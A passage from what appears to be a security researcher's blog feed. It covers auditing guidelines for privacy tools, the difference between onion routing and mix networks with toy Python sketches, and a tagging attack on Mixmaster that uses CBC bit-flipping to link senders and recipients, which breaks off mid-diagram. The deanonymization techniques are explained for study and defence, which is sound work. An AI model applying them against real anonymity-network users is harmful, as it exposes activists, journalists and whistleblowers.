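    if sep < 10:  # the spec requires at least 8 bytes of random filler
        raise ValueError("padding too short")
    return block[sep + 1:]
```

<p>After RSA decryption of the 128-byte blob (for a 1024-bit key), something like <code>pkcs1_v15_unpad</code> is what recovers the actual password.</p>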
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-libtech_guidelines.html</guid>
		<title>Liberation Technology Auditing Guidelines</title>
		<pubDate>27 Feb 2013 21:06:34 EST</pubDate>
		<description><![CDATA[
<p>Liberation Technology is kind of a catch-all bucket I borrowed from <a href="http://liberationtechnology.stanford.edu/">Stanford's Program & Listserv</a> that I use to describe technology that's designed to be used by activists, journalists, folks with increased privacy needs (survey participants, whistleblowers, law enforcement), and the like.  (I'm probably offending or upsetting someone by using this term willy nilly but I don't have a better one.)  These types of applications obviously have a higher bar for security: not only do they need to be free from the major 'bad' vulnerabilities like SQL Injection and Memory Corruption - but also thought and attention needs to be paid to things like "What third party requests are made?" and "What does my use of this application leak to a network observer?"</p>

<p>There is a dearth of folks who are good at reviewing these applications, and for the ones there are, their time is spread too thin and ultimately it's nobody's job, so it's done in their free time.  To that end, I took a stab at putting all the things I've picked up over the years together, in an effort to get more folks involved in the process.  That list (sponsored by my employer) lives over <a href="https://github.com/iSECPartners/LibTech-Auditing-Cheatsheet" class="themainlink">here at github</a>. It's aimed directly at fellow security consultants, and intended to list additional technical issues to search for when auditing these types of applications. I'm not nearly the best at this, and I don't do as much as I'd like to, but it's something, and you can improve or fork it.</p>

<p>What should you target with these ideas?  Everything!  There are high-profile applications like the ones by the <a href="https://www.torproject.org/projects/projects.html.en">Tor Project</a>, <a href="https://github.com/whispersystems">Whisper Systems</a>, and the <a href="https://guardianproject.info/apps/">Guardian Project</a>.  There are newer flashy projects like <a href="https://crypto.cat/">Cryptocat</a>, <a href="https://www.mega.co.nz/">MEGA</a>, and <a href="https://crypton.io/">Crypton</a>.  And there are brand-new projects that might take a bit of reverse engineering to understand - like <a href="https://www.mywickr.com/en/index.php">Wickr</a> and <a href="https://silentcircle.com/">Silent Circle</a>.  And this is not an exhaustive list.  The number of these types of applications has been increasing significantly in the past couple of years.  The number of auditors has not.</p>

<p>I hope this list will inspire more people to look at these applications and contribute to them.</p>

<p><em>This post originally appeared on <a href="https://isecpartners.com/news-events/news/2013/february/towards-better-security-when-the-stakes-are-high.aspx">iSEC Partners' blog</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-mix_and_onion_networks.html</guid>
		<title>The Differences Between Onion Routing and Mix Networks</title>
		<pubDate>12 Apr 2013 16:52:00 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p>As was pointed out in a recent <a href="/blog-cryptodotis-what_is_a_remailer.html">comment on the first blog post</a>, I had used the terms "mix network" and "onion routing" almost interchangeably.  In actuality I had fallen into a trap that a fair number of people familiar with the space have fallen into: using those terms without a solid differentiation.  This blog post aims to correct that.</p>

<p>Firstly, I must give credit where credit is due - Paul Syverson (one of the original authors of Tor) wrote the paper that cemented this in my head most clearly, and I will quote it, and then restate it with pictures:</p>

<blockquote>

<p>Mix networks get their security from the mixing done by their component
mixes, and may or may not use route unpredictability to enhance security. Onion
routing networks primarily get their security from choosing routes that are difficult 
for the adversary to observe, which for designs deployed to date has meant
choosing unpredictable routes through a network. And onion routers typically
employ no mixing at all. This gets at the essence of the two even if it is a bit too
quick on both sides. Mixes are also usually intended to resist an adversary that
can observe all traffic everywhere and, in some threat models, to actively change
traffic. Onion routing assumes that an adversary who observes both ends of a
communication path will completely break the anonymity of its traffic. Thus,
onion routing networks are designed to resist a local adversary, one that can
only see a subset of the network and the traffic on it.</p>

<p>- <a href="http://www.syverson.org/">Paul Syverson - Why I'm not an Entropist</a></p>
</blockquote>

<h3>Onion Routing</h3>

<p>Onion Routing gets its security from the fact (or assumption) that it is difficult for an adversary to position itself on networks such that it is able to view <em>all</em> the nodes in the route.  Practically speaking, if I built a route from my job in China, to a server in Australia, to a server in Russia, to a server in Sweden, and then visit a webpage in France - there are a number of adversaries who could see part of this path. For example: my employer, my employer's Internet Service Provider, the Chinese, Australian, Russian, Swedish, and French Governments, the website operator and their Internet Service Provider. But none of those entities are able to see the entire path (we hope!) because they do not own, control, or have direct influence over every network link I'm using. In this instance, Onion Routing can provide some security.</p>

<img src="/resources/cryptodotis/post6/slide3.png">
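<p>The layering itself can be sketched in a few lines of Python. This is a toy: the SHA-256 counter-mode "keystream" stands in for real encryption, and real designs also embed next-hop addressing inside each layer - it's here only to show that each node can remove exactly one layer and sees nothing inside the rest.</p>

```python
import hashlib

def _keystream(key: bytes, n: int) -> bytes:
    # Toy keystream: SHA-256 in counter mode.  A stand-in for real
    # encryption -- illustrative only, do not use for anything real.
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def _layer(data: bytes, key: bytes) -> bytes:
    # XOR with the keystream; applying it a second time removes the layer.
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))

def build_onion(message: bytes, route):
    # Wrap the message once per hop, innermost (exit) layer first.
    # route is a list of (node_name, node_key) pairs.
    onion = message
    for _name, key in reversed(route):
        onion = _layer(onion, key)
    return onion

def peel(onion: bytes, key: bytes) -> bytes:
    # Each node strips only the one layer it holds the key for.
    return _layer(onion, key)
```

<p>Passing the onion through each node in route order peels one layer at a time; only after the last hop does the plaintext emerge.</p>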

<h3>Onion Routing Attacked</h3>

<p>But if an adversary is able to see the entire path, Onion Routing loses its security.  I recently used a crowd of people in a real-life demonstration of this. Alice puts a message into an opaque film canister, and passes it to an onion routing node, who passes it to another, who passes it to another, who takes the message out of the canister, and hands it to the recipient Bob.  Everyone in the room can clearly see that it was Alice who passed a message to Bob, and even if there were multiple messages being passed, anyone could focus on an individual, and watch where the film canister they passed wound up.</p>

<p>There's been rumors and talks in the past of China or Iran cutting themselves off from the Internet, and making their own national Internet.  If they did, we could not just stand up a Tor network inside the country: it would provide no security because the government would be able to see the entire path.</p>

<img src="/resources/cryptodotis/post6/slide4.png">


<p>There is another scenario where Onion Routing is known to fall down. If the adversary can see one node (A), and later another node (C) - even if there is an unseen or unknown number of nodes between A and C, an attacker can correlate the traffic.  A specific instance of this means if an attacker can see you, and can see the website you're visiting, even if you create a path outside the adversary's control - they will still be able to correlate the traffic and learn you are visiting the website. This clearly raises concerns about using Onion Routing to visit a company website or websites related to your own government.</p>

<img src="/resources/cryptodotis/post6/slide5.png">
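<p>This correlation can be made concrete with a crude sketch. The scoring function below is a stand-in for the far more sophisticated statistical tests in the literature, and the timestamps are made up: the adversary watches Alice send messages and watches traffic arrive at two candidate sites, then scores each site by how often an arrival follows one of Alice's sends.</p>

```python
def correlation_score(entry_times, exit_times, window=2.0):
    """Fraction of entry events followed by an exit event within `window`
    seconds -- a toy stand-in for real traffic-correlation statistics."""
    hits = 0
    for t in entry_times:
        if any(0 <= u - t <= window for u in exit_times):
            hits += 1
    return hits / len(entry_times)

# The adversary sees Alice (entry) and two candidate websites (exits):
alice  = [1.0, 5.0, 9.0, 14.0, 20.0]
site_a = [1.8, 5.9, 9.7, 14.6, 20.9]   # every send is echoed shortly after
site_b = [3.0, 11.0, 17.0]             # unrelated traffic
```

<p>Site A scores a perfect match while Site B doesn't, so the adversary concludes Alice is talking to Site A - without ever seeing the middle of the path.</p>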

<h3>Mix Networks</h3>

<p>Mixing, however, is specifically designed to provide security even if an adversary can see the entire path. To demonstrate this to a crowd of people I had Alice, Bob, and Carol each submit messages, in opaque film canisters, into my mix node (my backpack).  With all three film canister messages in my bag, I shook it, and distributed each message to a new mix node, each of which also had a couple of messages in their bags already. Then those nodes distributed messages to 6 more mix nodes, and those mix nodes opened the messages and distributed them to recipients.  Although everyone was able to see all of the messages that were passed around - it's impossible to tell who got Alice's, Bob's, or Carol's specific message.  The mixing, in backpacks, creates uncertainty that the attacker is not able to overcome.</p>

<img src="/resources/cryptodotis/post6/slide6.png">

<p>Mixing isn't perfect.  An adversary can still conduct long term correlation attacks, and if no one or almost no one uses the mix network along with you - it's even easier to attack. Furthermore, just because mix networks provide stronger security against a stronger adversary does not mean they provide better security <em>in general</em>.  If you'd like to learn why, you can wait a while until I post about it, or just skip the middle man and read <em>Sleeping dogs lie on a bed of onions but wake when mixed</em> by <a href="http://www.syverson.org/">Paul Syverson</a>.</p>  

<h3>More Differences</h3>

<p>A Mix Node must collect more than one message before sending any out - otherwise the node is behaving as an onion router node with a time delay.  The more messages collected, the more uncertainty is introduced as to which message went where.  The specific mixing algorithms employed (often called pooling algorithms) will be a subject of a future blog post, but it's clear there must be multiple messages, which means the collected messages will generally sit in a mix node until 'sufficient' messages are collected (for some definition of sufficient).  This introduces latency.  If a mix node waits six hours to collect messages - well, that's up to six hours of latency.  Accordingly, mix networks are often casually referred to as 'high latency' and onion routing networks as 'low latency'.  But the latency doesn't impart security - it's the mixing.</p>
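<p>The simplest pooling strategy - a threshold mix - fits in a few lines of Python. This is an illustrative sketch, not Mixmaster's actual algorithm: the node buffers messages and flushes a shuffled batch only once enough have accumulated, which is exactly where the latency comes from.</p>

```python
import random

class ThresholdMix:
    """Minimal threshold mix: buffer incoming messages and flush a
    shuffled batch only once `threshold` messages have accumulated."""
    def __init__(self, threshold: int):
        self.threshold = threshold
        self.pool = []

    def accept(self, message):
        self.pool.append(message)
        if len(self.pool) >= self.threshold:
            batch, self.pool = self.pool, []
            random.shuffle(batch)  # output order no longer reveals arrival order
            return batch
        return None  # keep waiting -- this is the source of the latency
```

<p>With a threshold of 3, the first two messages just sit in the pool; only the third triggers a flush, and the batch comes out in a random order.</p>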

<p>Tor is an Onion Routing network.  It employs no mixing, and barring normal system task scheduling and processing, messages are sent as soon as they are received. The attacks described against onion routing above can and have been shown to work against Tor. While there is no evidence a government has resorted to performing the types of statistical attacks described in academic papers - they have done rudimentary correlation involving physical surveillance.  Specifically: they watched a suspect arrive home, they watched some Tor traffic originate from his home, and they watched as the nickname they suspected was him appeared in the IRC channel.  <span class="footnote">If you're curious, you can read more about that <a href="http://arstechnica.com/tech-policy/2012/03/stakeout-how-the-fbi-tracked-and-busted-a-chicago-anon/2/">over here</a>.</span> Although Tor is a powerful tool, it is possible to distinguish Tor traffic from normal traffic, and it is possible to perform correlation-based attacks to de-anonymize your use of it. </p>


<p><em>Something to keep in mind is that deployed mix networks (Mixmaster, Mixminion) are not designed to disguise the fact that you are <u>using</u> a mix network. If an adversary can simply lock you up for using anonymity tools, you need to disguise your use of anonymity tools, which is a whole other topic. Similarly, these tools are relatively obscure, and if an adversary can look across a large quantity of email traffic for someone who has received a Mixmaster message but had not previously, simple correlation may also be possible. </em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-tagging_attack_on_mixmaster.html</guid>
		<title>A Tagging Attack on Mixmaster</title>
		<pubDate>05 Jan 2013 23:48:00 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
.packet {
    font-style: italic;
    font-variant: small-caps;
    font-family: monospace;
}
pre {
    padding-left:30px;
}
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p>We've laid the groundwork in the past two blog posts to explain a tagging attack on the Mixmaster remailer system.  In our scenario, an attacker runs several remailer nodes in a system.</p>

<p><img src="/resources/cryptodotis/post5/network.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>An attacker may get lucky and control the first and last nodes in a path.</p>  

<p><img src="/resources/cryptodotis/post5/path.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>This seems a hopeless scenario - but for a single message, a good remailer network <strong>can</strong> provide unlinkability in this situation.  An attacker would know that Alice sent an email, and they would know that john@nytimes.com received an email, and its contents - but the attacker <strong>should not</strong> be able to link these two messages together.  That unlinkability is supposed to be provided by the middle node. But the unlinkability is lost if the attacker can tag the message in a way they can recognize later.  <span class="footnote">This example also illustrates why you want a lot of people using an anonymity network - there are vastly more people in the crowd who could have sent the incoming message, and vastly more outgoing messages that Alice could have sent.</span></p>

<p>But where in the Mixmaster packet format can we create a tag that won't be rejected by the middle node, would allow us to recognize the tag when we see it, and not corrupt the Mix Message so much that we are unable to determine the ultimate destination of the message? Let's go back to the packet format (which we covered in a <a href="/blog-cryptodotis-packet_formats_1.html">previous blog post</a>) - we'll display the data we will see, and what we know, as it leaves the first (attacker-controlled) node.</p>


<style type="text/css">
#two #two_header1_enc, #two #two_header2, .lightred {
    background: #FFDDDD;
}
#two #two_header2_enc, #two #two_payload, .darkred {
    background: #FF7777;
}
</style>

<pre>
<fieldset id="two"><legend>Mixmaster Intermediate Message, as it is on it's way to the Second Hop</legend><fieldset id="two_headers"><legend>Mix Headers</legend><fieldset id="two_header1"><legend>Mix Header 1</legend>Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
<span id="two_header1_rsasessionkey">RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678</span>     
                           <span id="two_header1_decryptsto">Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC</span>
<span id="two_header1_iv">Initialization Vector      0x09090909 0x09090909</span>
<fieldset id="two_header1_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45</span>
Packet Type Identifier     0x02
Packet Information
<span id="two_header1_enc_iv">Initialization Vector1     0x0A0A0A0A 0x0A0A0A0A
Initialization Vector2     0x0B0A0A0A 0x0B0A0A0A
Initialization Vector3     0x0C0A0A0A 0x0C0A0A0A
Initialization Vector4     0x0D0A0A0A 0x0D0A0A0A
Initialization Vector5     0x0E0A0A0A 0x0E0A0A0A
Initialization Vector6     0x0F0A0A0A 0x0F0A0A0A
Initialization Vector7     0x1A0A0A0A 0x1A0A0A0A
Initialization Vector8     0x1B0A0A0A 0x1B0A0A0A
Initialization Vector9     0x1C0A0A0A 0x1C0A0A0A
Initialization Vector10    0x1D0A0A0A 0x1D0A0A0A
Initialization Vector11    0x1F0A0A0A 0x1F0A0A0A
Initialization Vector12    0x2A0A0A0A 0x2A0A0A0A
Initialization Vector13    0x2B0A0A0A 0x2B0A0A0A
Initialization Vector14    0x2C0A0A0A 0x2C0A0A0A
Initialization Vector15    0x2D0A0A0A 0x2D0A0A0A
Initialization Vector16    0x2E0A0A0A 0x2E0A0A0A
Initialization Vector17    0x2F0A0A0A 0x2F0A0A0A
Initialization Vector18    0x3A0A0A0A 0x3A0A0A0A
Initialization Vector19    0x3B0A0A0A 0x3B0A0A0A</span>
Remailer Address           exitremailer@exam.com 0x00 0x00 (Padded to 80 bytes)
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
</fieldset></fieldset><fieldset id="two_header2"><legend>Mix Header 2</legend>
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
<span id="two_header2_rsasessionkey">RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678</span>     
Initialization Vector      0x09090909 0x09090909
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45</span>
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
<span id="two_header1_enc_iv">Initialization Vector      0x0A0A0A0A 0x0A0A0A0A</span>
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
</fieldset></fieldset></fieldset><fieldset id="two_headers3"><legend>Mix Headers 3-20</legend>Fake, Unimportant Data     0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....
</fieldset><fieldset id="two_payload"><legend>Mix Payload</legend><fieldset id="two_payload_inner"><span>Indecipherable Data</span></fieldset></fieldset></fieldset>
</pre>

<p> The different layers of red represent the number of times the data is encrypted.  <span class="lightred">Light Red</span> is encrypted once.  <span class="darkred">Dark Red</span> must be sent through two decryptions before the plaintext is legible. The ciphertext is encrypted in <a href="https://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher-block_chaining_.28CBC.29">Cipher Block Chaining Mode</a>, which allows us to make small modifications to the ciphertext that cause small modifications to the plaintext.  It's not as precise as we'd like - flipping a single bit will entirely corrupt the 8 bytes of that data block, but it will flip only the corresponding bit of the subsequent data block.  Let's zero in on the second Mix Header, and illustrate the data blocks.</p>

<style type="text/css">
.wholeblock, .leftblock, .rightblock, .middleblock {
    margin:2px;
    border: solid;
    border-color: red;
}
.wholeblock {
    border-width: 1px;
}
.leftblock {
    border-width: 1px 0px 1px 1px;
}
.rightblock {
    border-width: 1px 1px 1px 0px;
}
.middleblock {
    border-width: 1px 0px 1px 0px;
}
#two_header2 .wholeblock, #two_header2 .leftblock, #two_header2 .rightblock, #two_header2 .middleblock {
    border-color: blue;
}
.bluebg {
    background-color:blue;
}
.redbg {
    background-color:red;
}
</style>

<pre>
<fieldset id="two_header2"><legend>Mix Header 2</legend>Public Key ID (16 bytes)   <span class="wholeblock">0xABCDABCD 0xABCDABCD</span> <span class="wholeblock">0xABCDABCD 0xABCDABCD</span>
Length of RSA Enc-ed Data  <span class="leftblock">0xF0</span>
<span id="two_header2_rsasessionkey">RSA Encrypted Session Key  <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
         (128 bytes)       <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>

                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span></span>     
Initialization Vector      <span class="rightblock">0x09090909 0x090909</span><span class="leftblock">09</span>
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       <span class="rightblock">0x87214365 0x872143</span><span class="wholeblock">65 0x87214365 0x872143</span><span class="leftblock">65</span>
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span></span>
Packet Type Identifier     <span class="middleblock">0x01</span>
Packet Information
Message ID (16 bytes)      <span class="rightblock">0x31537597 0x3153</span><span class="wholeblock">7597 0x31537597 0x3153</span><span class="leftblock">7597</span>
<span id="two_header1_enc_iv">Initialization Vector      <span class="rightblock">0x0A0A0A0A 0x0A0A</span><span class="leftblock">0A0A</span></span>
Timestamp                  <span class="rightblock">0x30303030 0x0005</span><span class="leftblock">06</span>
Message Digest             <span class="rightblock">0x11112222 0x111122</span><span class="wholeblock">22 0x11112222 0x111122</span><span class="leftblock">22</span>
Padding                    <span class="rightblock">0x01020304 0x050607</span><span class="wholeblock">08 0x01020304 0x050607</span><span class="leftblock">08</span>
                           (Fill to 328 Bytes..)
</fieldset></fieldset></pre>

<p>The blue blocks illustrate the blocks of data that will be encrypted in CBC mode.  Flipping a bit in one of these will corrupt the entire block, and flip the corresponding bit in the following block.  However, remember we're dealing with multiple layers of encryption: the Encrypted Header Part is <em>also</em> encrypted, and its block offsets are different.</p>

<pre>
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       <span class="wholeblock">0x87214365 0x87214365</span> <span class="wholeblock">0x87214365 0x87214365</span>
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       <span class="wholeblock">0xFE45FE45 0xFE45FE45</span>
                           <span class="wholeblock">0xFE45FE45 0xFE45FE45</span>
                           <span class="wholeblock">0xFE45FE45 0xFE45FE45</span></span>
Packet Type Identifier     <span class="leftblock">0x01</span>
Packet Information
Message ID (16 bytes)      <span class="rightblock">0x31537597 0x315375</span><span class="wholeblock">97 0x31537597 0x315375</span><span class="leftblock">97</span>
<span id="two_header1_enc_iv">Initialization Vector      <span class="rightblock">0x0A0A0A0A 0x0A0A0A</span><span class="leftblock">0A</span></span>
Timestamp                  <span class="rightblock">0x30303030 0x000506</span>
Message Digest             <span class="wholeblock">0x11112222 0x11112222</span> <span class="wholeblock">0x11112222 0x11112222</span>
Padding                    <span class="wholeblock">0x01020304 0x05060708</span> <span class="wholeblock">0x01020304 0x05060708</span>
                           (Fill to 328 Bytes..)
</fieldset></pre>

<p>Any byte we manipulate in the second Mix Header will entirely corrupt that blue block of data, plus the corresponding byte in the subsequent block.  Every corrupted blue byte will corrupt any red block that contains it, and each corrupted red block will in turn corrupt the subsequent red block.  But we can't afford a corruption that renders the Encryption Key or IV irrecoverable - or we won't be able to decrypt the payload - so we must choose carefully.</p>

<h3>The Attack</h3>

<p>Now to end the suspense ;) If we manipulate the last byte of the Message Digest, we trigger a cascading corruption that does not affect the Key or IV. First we manipulate that byte:</p>

<pre>
<fieldset id="two_header2"><legend>Mix Header 2</legend>Public Key ID (16 bytes)   <span class="wholeblock">0xABCDABCD 0xABCDABCD</span> <span class="wholeblock">0xABCDABCD 0xABCDABCD</span>
Length of RSA Enc-ed Data  <span class="leftblock">0xF0</span>
<span id="two_header2_rsasessionkey">RSA Encrypted Session Key  <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
         (128 bytes)       <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>

                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span></span>     
Initialization Vector      <span class="rightblock">0x09090909 0x090909</span><span class="leftblock">09</span>
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       <span class="rightblock">0x87214365 0x872143</span><span class="wholeblock">65 0x87214365 0x872143</span><span class="leftblock">65</span>
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span></span>
Packet Type Identifier     <span class="middleblock">0x01</span>
Packet Information
Message ID (16 bytes)      <span class="rightblock">0x31537597 0x3153</span><span class="wholeblock">7597 0x31537597 0x3153</span><span class="leftblock">7597</span>
<span id="two_header1_enc_iv">Initialization Vector      <span class="rightblock">0x0A0A0A0A 0x0A0A</span><span class="leftblock">0A0A</span></span>
Timestamp                  <span class="rightblock">0x30303030 0x0005</span><span class="leftblock">06</span>
Message Digest             <span class="rightblock">0x11112222 0x111122</span><span class="wholeblock">22 0x11112222 0x111122</span><span class="leftblock bluebg">22</span>
Padding                    <span class="rightblock">0x01020304 0x050607</span><span class="wholeblock">08 0x01020304 0x050607</span><span class="leftblock">08</span>
                           (Fill to 328 Bytes..)
</fieldset></fieldset></pre>

<p>On decryption this corrupts the entire block, and flips the corresponding byte in the subsequent block:</p>

<pre>
<fieldset id="two_header2"><legend>Mix Header 2</legend>Public Key ID (16 bytes)   <span class="wholeblock">0xABCDABCD 0xABCDABCD</span> <span class="wholeblock">0xABCDABCD 0xABCDABCD</span>
Length of RSA Enc-ed Data  <span class="leftblock">0xF0</span>
<span id="two_header2_rsasessionkey">RSA Encrypted Session Key  <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
         (128 bytes)       <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>

                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span>
                           <span class="rightblock">0x12345678 0x123456</span><span class="wholeblock">78 0x12345678 0x123456</span><span class="leftblock">78</span></span>     
Initialization Vector      <span class="rightblock">0x09090909 0x090909</span><span class="leftblock">09</span>
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       <span class="rightblock">0x87214365 0x872143</span><span class="wholeblock">65 0x87214365 0x872143</span><span class="leftblock">65</span>
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span>
                           <span class="rightblock">0xFE45FE45 0xFE45FE</span><span class="leftblock">45</span></span>
Packet Type Identifier     <span class="middleblock">0x01</span>
Packet Information
Message ID (16 bytes)      <span class="rightblock">0x31537597 0x3153</span><span class="wholeblock">7597 0x31537597 0x3153</span><span class="leftblock">7597</span>
<span id="two_header1_enc_iv">Initialization Vector      <span class="rightblock">0x0A0A0A0A 0x0A0A</span><span class="leftblock">0A0A</span></span>
Timestamp                  <span class="rightblock">0x30303030 0x0005</span><span class="leftblock">06</span>
Message Digest             <span class="rightblock">0x11112222 0x111122</span><span class="wholeblock">22 0x11112222 0x111122</span><span class="leftblock bluebg">22</span>
Padding                    <span class="rightblock bluebg">0x01020304 0x050607</span><span class="wholeblock"><span class="bluebg">08</span> 0x01020304 0x050607</span><span class="leftblock">08</span>
                           (Fill to 328 Bytes..)
</fieldset>
</fieldset>
</pre>

<p>This in turn corrupts every inner-layer block containing one of those bytes, and alters the following block in an unpredictable fashion:</p>

<pre>
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend>Packet ID (16 bytes)       <span class="wholeblock">0x87214365 0x87214365</span> <span class="wholeblock">0x87214365 0x87214365</span>
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       <span class="wholeblock">0xFE45FE45 0xFE45FE45</span>
                           <span class="wholeblock">0xFE45FE45 0xFE45FE45</span>
                           <span class="wholeblock">0xFE45FE45 0xFE45FE45</span></span>
Packet Type Identifier     <span class="leftblock">0x01</span>
Packet Information
Message ID (16 bytes)      <span class="rightblock">0x31537597 0x315375</span><span class="wholeblock">97 0x31537597 0x315375</span><span class="leftblock">97</span>
